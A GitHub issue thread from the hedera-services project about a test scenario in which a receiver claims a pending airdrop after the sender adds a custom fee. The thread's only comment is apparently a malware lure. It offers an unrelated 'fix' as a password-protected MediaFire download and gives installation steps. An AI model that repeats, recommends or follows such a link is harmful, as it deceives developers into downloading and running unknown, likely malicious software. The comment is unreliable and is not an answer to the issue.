### ISSUE TITLE
(CLAIM_30) Given a receiver has a pending airdrop and while in pending the sender sets the airdropped token to have a custom fee to be paid by the receiver when the receiver claims the airdrop then no custom fees should be paid by the receiver.

### ISSUE THREAD

**Issue by povolev15** [hashgraph/hedera-services#15250]

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
